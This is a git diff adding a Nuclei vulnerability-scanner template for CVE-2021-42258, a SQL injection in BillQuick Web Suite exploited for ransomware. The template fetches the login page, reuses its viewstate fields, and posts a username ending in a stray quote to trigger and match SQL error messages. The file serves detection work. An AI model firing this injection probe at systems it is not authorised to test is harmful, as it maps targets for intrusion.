diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml new file mode 100644 index 0000000000..64def1d504 --- /dev/null +++ b/cves/2021/CVE-2021-42258.yaml @@ -0,0 +1,64 @@ +id: CVE-2021-42258 + +info: + name: BillQuick Web Suite SQLi + author: dwisiswant0 + severity: high + tags: cve,cve2021,sqli,billquick + description: | + BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 + allows SQL injection for unauthenticated remote code execution, + as exploited in the wild in October 2021 for ransomware installation. + SQL injection can, for example, use the txtID (aka username) parameter. + Successful exploitation can include the ability to execute + arbitrary code as MSSQLSERVER$ via xp_cmdshell. + reference: + - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + + cookie-reuse: true + extractors: + - type: xpath + name: VS + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATE']" + + - type: xpath + name: VSG + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" + + - type: xpath + name: EV + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__EVENTVALIDATION']" + + matchers: + - type: word + part: body + condition: and + words: + - "System.Data.SqlClient.SqlException" + - "Incorrect syntax near" + - "_ACCOUNTLOCKED"